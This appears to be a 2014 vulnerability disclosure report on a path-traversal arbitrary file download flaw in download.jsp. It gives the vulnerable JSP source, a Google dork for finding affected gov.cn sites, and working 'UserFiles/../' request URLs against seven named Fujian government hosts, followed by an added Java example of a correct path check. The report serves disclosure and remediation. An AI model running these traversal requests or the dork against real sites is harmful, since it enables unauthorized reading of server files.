2014-02-19: Details reported to the vendor, awaiting vendor response
2014-02-24: Vendor has confirmed; details disclosed to the vendor only
2014-02-27: Details opened to third-party security partners
2014-04-20: Details opened to core white hats and experts in related fields
2014-04-30: Details opened to regular white hats
2014-05-10: Details opened to intern white hats
2014-05-20: Details disclosed to the public
Arbitrary file download 0.0
1. The vulnerability is in download.jsp. Let's look at the source:
<%@ page language="java" contentType="application/x-msdownload" import="java.io.*,java.net.*" pageEncoding="gb2312" %>
<%
String temp = request.getParameter("path");
if (temp.indexOf("UserFiles") == -1) { // only checks whether the keyword "UserFiles" appears anywhere in the URL
    out.println("非法下载路径!");
    return;
}
String path = temp; // new String(temp.getBytes("8859_1"), "gb2312");
// temp is assigned to path without any sanitization and is then used for the file read below
response.reset();
response.setContentType("application/x-download");
String filenamedownload = path;
String filenamedisplay = path.substring(path.lastIndexOf("/") + 1, path.length());
filenamedisplay = URLEncoder.encode(filenamedisplay, "UTF-8");
response.addHeader("Content-Disposition", "attachment;filename=" + filenamedisplay);
OutputStream output = null;
FileInputStream fis = null;
try {
    output = response.getOutputStream();
    // the web root is prepended by string concatenation, so "../" in path still escapes UserFiles
    filenamedownload = request.getSession().getServletContext().getRealPath("/") + filenamedownload;
    System.out.println("filenamedownload:" + filenamedownload);
    File file = new File(filenamedownload);
    if (!file.exists()) {
        out.println("对不起,文件已删除");
        return;
    }
    fis = new FileInputStream(filenamedownload); // and this is where the problem occurs
    byte[] b = new byte[1024];
    int i = 0;
    while ((i = fis.read(b)) > 0) {
        output.write(b, 0, i);
    }
    output.flush();
} ………………
%>
Some versions look like this:
// st: the path parameter split into components (its definition is not shown in the report)
if (st != null && st.length > 0) {
    if (!"UserFiles".equals(st[0])) { // only the first component is checked; later ".." components are not
        out.println("文件不存在");
        return;
    }
}
if (temp == null) temp = "";
String path = new String(temp.getBytes("8859_1"), "gb2312");
response.reset();
String filenamedownload = path;
String filenamedisplay = path.substring(path.lastIndexOf("/") + 1, path.length()); // leftover sample names: "系统解决方案.doc"; 系统解决方案.txt
filenamedisplay = URLEncoder.encode(filenamedisplay, "UTF-8");
response.addHeader("Content-Disposition", "attachment;filename=" + filenamedisplay);
OutputStream output = null;
FileInputStream fis = null;
It is basically the same thing...
2. Google dork: let's see whether it is widespread:
site:gov.cn inurl:download.jsp?path=/UserFiles/
About 2,590 results.
3. Testing on one of the sites:
jjcx.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
4. Sites provided for easy verification and to show how widespread it is:
jjcx.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
www.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
crj.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
qz.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
www.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
fz.fjhi.gov.cn/site/fuzhou/bin//download.jsp?path=UserFiles/../download.jsp
xxgk.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
Please notify them to get it fixed.
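For comparison, an added example (not code from the report or from the affected download.jsp): the report's substring check beside a check that confines the resolved path to the UserFiles directory, run against the "UserFiles/../download.jsp" request above. The web root /var/www/app and the file name report.doc are constructed for illustration.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class DownloadPathCheck {

    // The check described in the report: passes as long as "UserFiles" appears anywhere.
    static boolean substringCheck(String requested) {
        return requested != null && requested.indexOf("UserFiles") != -1;
    }

    // Confining check: join the parameter to the web root the way the JSP does,
    // normalize away "." and "..", and require the result to stay under
    // <webRoot>/UserFiles. Returns the resolved path, or null when it escapes.
    static Path confineToUserFiles(Path webRoot, String requested) {
        if (requested == null || requested.isEmpty()) {
            return null;
        }
        // the JSP concatenates getRealPath("/") + path, so a leading "/" is relative to the web root
        String relative = requested.replaceFirst("^/+", "");
        Path root = webRoot.toAbsolutePath().normalize();
        Path userFiles = root.resolve("UserFiles");
        Path candidate = root.resolve(relative).normalize();
        // startsWith compares whole path components, so "UserFilesX/..." does not match
        if (candidate.equals(userFiles) || !candidate.startsWith(userFiles)) {
            return null;
        }
        return candidate;
    }

    public static void main(String[] args) {
        Path webRoot = Paths.get("/var/www/app"); // hypothetical deployment root
        String[] requests = {
            "UserFiles/report.doc",       // constructed legitimate download
            "/UserFiles/report.doc",      // same file, leading slash as in the dork
            "UserFiles/../download.jsp",  // the request used in the report
        };
        for (String r : requests) {
            Path p = confineToUserFiles(webRoot, r);
            System.out.printf("%-28s substring=%-5s confined=%s%n",
                    r, substringCheck(r), p == null ? "REJECTED" : p);
        }
    }
}
```

The substring check accepts all three requests; the confining check accepts only the two that resolve inside UserFiles, so the source of download.jsp itself can no longer be fetched. For files that already exist, resolving with toRealPath() before the startsWith test also closes the symlink case.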
Severity: High
Vulnerability Rank: 18
Confirmed at: 2014-02-24 09:18
File inclusion caused by the kind of download page described here is fairly common. Based on follow-up spot checks of the instances, it cannot yet be determined whether the 2,590 results belong to the same CMS or the same developer (it is also quite common for parts of the functional code to share a common origin). The cases involving websites in Fujian Province have been forwarded through CNCERT to the Fujian branch center for handling (two or three such cases had already been reported by white hats before this).
None yet